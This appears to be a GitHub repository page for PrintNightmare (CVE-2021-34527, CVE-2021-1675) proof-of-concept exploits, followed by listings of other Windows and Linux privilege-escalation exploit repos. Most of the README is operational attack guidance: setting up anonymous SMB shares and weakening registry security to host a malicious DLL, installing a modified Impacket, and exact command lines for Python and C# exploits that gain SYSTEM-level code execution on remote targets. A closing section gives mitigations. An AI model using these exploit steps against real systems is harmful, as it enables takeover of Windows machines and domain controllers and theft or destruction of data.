PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675) proof of concept exploits

Related tags

Cryptography
Overview

PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (CVE-2021-34527, CVE-2021-1675)

Summary

This is a remote code execution vulnerability that can be used to obtain SYSTEM level privileges by an authenticated remote user against Windows machines running the print spooler service. An attacker could then use that access to create new accounts, attempt to install programs; view, change, or delete data; or create new accounts with full user rights.

This vulnerability exists due to an authorisation bypass bug in the Print Spooler service spoolsv.exe on Windows systems, which allows authenticated remote users to install print drivers using the RPC call RpcAddPrinterDriver and specify a driver file located on a remote location. A malicious user exploiting this could obtain SYSTEM level privileges on a Windows system running this service by injecting malicious DLLs as part of installing a print driver.

While Microsoft has released an update for CVE-2021-1675, this update does not protect Active Directory domain controllers or Windows systems that have Point and Print configured with the NoWarningNoElevationOnInstall option configured.

There are three PoC exploit implementations in this repo:

Technical Details

Affected Systems

  • All versions of Windows contain the vulnerable code and are vulnerable as of 4th July 2021. The exploits have been tested on Windows Windows 2019 Server & Windows 10 Pro.

Proof of Concept Exploits

As the RPC service allows the client machine to provide a location for the print drivers to be downloaded by the remote server, the following example options can be used to host the payload and the path provided when running the exploit:

Samba Share Setup

  • Unix/Linux:

    Edit the /etc/samba/smb.conf and enable anonymous access

    [global]
        map to guest = Bad User
        server role = standalone server
        usershare allow guests = yes
        idmap config * : backend = tdb
        smb ports = 445
    
    [smb]
        comment = Samba
        path = /tmp/
        guest ok = yes
        read only = no
        browsable = yes
        force user = smbuser
    
  • Windows:

    mkdir C:\share
    icacls C:\share\ /T /grant Anonymous` logon:r
    icacls C:\share\ /T /grant Everyone:r
    New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
    REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
    REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
    REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
    REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
    # Reboot
    

The below are slightly updated instructions from the ones provided by cube0x0:

CVE-2021-34527 python script

This is the Impacket implementation of the Printnightmare exploit by cube0x0. Before running the exploit you need to install a modified version of Impacket:

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Exploit Usage:

Exploit code for this vulnerability needs to be run using Python 3

usage: CVE-2021-34527.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share

CVE-2021-1675/34527 implementation.

positional arguments:
  target                [[domain/]username[:password]@]
  share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'

optional arguments:
  -h, --help            show this help message and exit

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
                        and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server

Example;
./CVE-2021-34527.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-34527.py hackit.local/domain_user:[email protected] 'C:\addCube.dll'

SharpPrintNightmare

The SharpPrintNightmare/ directory contains the C# Implementation of the Printnightmare exploit, for both Local Privilege Escalation (LPE) (CVE-2021-1675), as well as Remote Code Execution (RCE). The RCE functionality requires execution with local admin privileges on the machine running the exploit.

Exploit Usage:

#LPE
C:\SharpPrintNightmare.exe C:\addCube.dll

#RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'

#RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' domain.local domain_username password

EXP/ Usage instructions from afwu

Exploit Usage:

.\PrintNightmare.exe dc_ip path_to_exp user_name password

Example:
.\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123##

Mitigation/Workarounds

Determine if the Print Spooler service is running

Run the following:

Get-Service -Name Spooler

If the Print Spooler is running or if the service is not set to disabled, select one of the following options to either disable the Print Spooler service, or to Disable inbound remote printing through Group Policy:

Option 1 - Disable the Print Spooler service

If disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands (recommendation from Microsoft):

Stop-Service -Name Spooler -Force

Set-Service -Name Spooler -StartupType Disabled

or Disable Spooler service using registry

Stop-Service Spooler
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f

or Uninstall Print-Services

Uninstall-WindowsFeature Print-Services

This will disable the ability to print both locally and remotely.

Option 2 - Disable inbound remote printing through Group Policy

You can also configure the settings via Group Policy as follows:

Computer Configuration / Administrative Templates / Printers

Disable the “Allow Print Spooler to accept client connections:” policy to block remote attacks.

This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.

For more information see: Use Group Policy settings to control printers.

Acknowledgements

  • According to MSRC security bullion, this vulnerability is reported by Zhipeng Huo, Piotr Madej and Zhang Yunhai.
  • cube0x0
  • afwu
Owner
Jay K
Jay K
vulnerability in zam64.sys, zam32.sys allowing ring 0 code execution. CVE-2021-31727 and CVE-2021-31728 public reference.

CVE-2021-31727 and CVE-2021-31728 Public Reference for CVE-2021-31727 Exposes unrestricted disk read/write capabilities. Public Reference for CVE-2021

null 63 Jul 22, 2022
Windows Etw LPE

CVE-2021-34486 Windows Etw LPE olny tested on windwos 20H2 x64 ed2k://|file|cn_windows_10_business_editions_version_20h2_updated_march_2021_x64_dvd_ca

WangTT 42 Apr 24, 2022
MAZE - a mineable (proof-of-work) smartBCH SEP20 token and miner

smartMaze miner MAZE - a mineable (proof-of-work) smartBCH SEP20 token based on 0xBitcoin MAZE Token website MAZE Token Telegram Group MAZE Token cont

Maze Token 8 Feb 11, 2022
CVE-2021-29337 - Privilege Escalation in MODAPI.sys (MSI Dragon Center)

CVE-2021-29337 - Privilege Escalation in MODAPI.sys (MSI Dragon Center) General Affected Product: MSI Dragon Center Affected Version: 2.0.104.0 Descri

Rajat Gupta 27 Jul 20, 2022
CVE-2021-3493 Ubuntu OverlayFS Local Privesc (Interactive Bash Shell & Execute Command Entered)

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not prop

3ND 31 Jul 5, 2022
Windows Elevation

What's this This project is mainly used to collect the commonly used exp of Windows platform and give the relevant repair scheme. On the one hand, it

Al1ex 464 Aug 8, 2022
wtf is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and / or kernel-mode targets running on Microsoft Windows.

wtf is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and / or kernel-mode targets running on Microsoft Windows.

Axel Souchet 961 Aug 8, 2022
How to exploit a vulnerable windows driver. Exploit for AsrDrv104.sys

Exploit and Proof of Concept (PoC) for CVE-2020-15368. Asrock repackaged rweverything driver for their RGB controller configuration tool and signed it. They "protect" it by encrypting their ioctls...lol. We found this CVE by accident last summer, and afaik the driver still isn't patched. The impact is of course arbitrary code execution in kernel, etc. So enjoy this "0day" lol.

Stephen Tong 334 Aug 11, 2022
vsomeip Library for Windows Msys2 MinGW64

vsomeip-msys2-mingw64 vsomeip Library for Windows Msys2 MinGW64 vsomeip Copyright Copyright (C) 2015-2017, Bayerische Motoren Werke Aktiengesellschaft

null 1 Oct 27, 2021
This tool demonstrates the power of UAC bypasses and built-in features of Windows.

Auto-Elevate This tool demonstrates the power of UAC bypasses and built-in features of Windows. This utility auto-locates winlogon.exe, steals and imp

null 121 Jul 29, 2022
PrintNightmare , Local Privilege Escalation of CVE-2021-1675 or CVE-2021-34527

CVE-2021-1675-LPE-EXP Simple LPE Exploit of CVE-2021-1675 Usage CVE-2021-1675-LPE.exe

evilash 46 Jul 22, 2022
Proof of Concept for CVE-2021-1585: Cisco ASA Device Manager RCE

staystaystay staystaystay is a proof of concept exploit for CVE-2021-1585, a man in the middle or evil endpoint RCE issue affecting Cisco ASA Device M

Jake Baines 8 Jun 23, 2022
CVE-2021-1675 (PrintNightmare)

CVE-2021-1675(PrintNightmare) system shell poc for CVE-2021-1675 (Windows Print Spooler Elevation of Privilege) credit: Zhiniang Peng (@edwardzpeng) &

valen 68 Jun 20, 2022
PoC (DoS) for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell DoS PoC for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 415 Jul 28, 2022
Exploit for CVE-2021-40449 - Win32k Elevation of Privilege Vulnerability (LPE)

CallbackHell Exploit for CVE-2021-40449 (Win32k - LPE) CallbackHell Description Technical Writeup PoC References Description CVE-2021-40449 is a use-a

Oliver Lyak 415 Jul 28, 2022
PRINT++ is a simple, open source print library for C++, the main usage of PRINT++ is printing out "log" messages

note that for now, print++ is using std::cout. In future it will be using own print function. Windows version can be unstable That library is in alpha

Ksawery 3 Jan 23, 2022
A refactored Proof-of-concept originally developed in 2017 to print all function calls with their arguments data types and values using Ptrace during program execution.

print-function-args-debugger A refactored Proof-of-concept originally developed in 2017 to print all function calls with their arguments data types an

*finixbit 15 Jun 17, 2022
vulnerability in zam64.sys, zam32.sys allowing ring 0 code execution. CVE-2021-31727 and CVE-2021-31728 public reference.

CVE-2021-31727 and CVE-2021-31728 Public Reference for CVE-2021-31727 Exposes unrestricted disk read/write capabilities. Public Reference for CVE-2021

null 63 Jul 22, 2022
CVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept

CVE-2021-4034 Proof of Concept Qualys researches found a pretty cool local privilege escalation vulnerability in Polkit's pkexec: writeup, tweet. This

Marco Bonelli 20 Jun 22, 2022
Proof of Concept (PoC) CVE-2021-4034

PwnKit-Exploit CVE-2021-4034 @c0br40x help to make this section in README!! Proof of Concept [email protected]:~/PwnKit-Exploit$ make cc -Wall exploit.

Luis Javier 51 Jul 16, 2022
My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal.

CVE-2021-40449 My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal. short wu along with the UAF vulnerabilty other

hakivvi 30 Jul 27, 2022
Local Privilege Escalation Edition for CVE-2021-1675

Local Privilege Escalation Edition of CVE-2021-1675/CVE-2021-34527 Local Privilege Escalation implementation of the CVE-2021-1675/CVE-2021-34527 (a.k.

Halil Dalabasmaz 330 Jul 27, 2022
win32k LPE bypass CVE-2021-1732

CVE-2022-21882 win32k LPE bypass CVE-2021-1732 Test only tested on windows 20h2 19042.1415 tested on windows 21H1 (not working) Download https://raw.g

null 6 Apr 12, 2022
A small proof-of-concept for using disk devices for DMA on Windows.

ddma A small proof-of-concept for using disk devices for DMA on Windows. Why Some native hypervisors (i.e. Hyper-V) allow the guest unvirtualized devi

null 42 Jun 7, 2022
Proof-of-concept code to reconstruct the GUI of a Xen guest running Windows

vmi-reconstruct-gui A proof-of-concept to reconstruct the GUI of a Xen VM running Windows 7. ❗ Disclaimer This repository is work in progress. It curr

Jan 12 Oct 22, 2021
A proof of concept demonstrating instrumentation callbacks on Windows 10 21h1 with a TLS variable to ensure all syscalls are caught.

Instrumentation callbacks are quite a fun undocumented part of Windows. All the code in this repository is released under the MIT license. This repository uses google style C++.

Deputation 47 Aug 6, 2022
A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.

This repository contains a personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to

null 76 Aug 10, 2022
GPU Task Spooler - A SLURM alternative/job scheduler for a single simulation machine

GPU Task Spooler - A SLURM alternative/job scheduler for a single simulation machine

Duc Nguyen 77 Aug 9, 2022
A static analysis tool that helps security researchers scan a list of Windows kernel drivers for common vulnerability patterns in drivers (CVE makers!)

Driver Analyzer A static analysis tool that helps security researchers scan a list of Windows kernel drivers for common vulnerability patterns in driv

BehroozAbbassi 43 Jul 31, 2022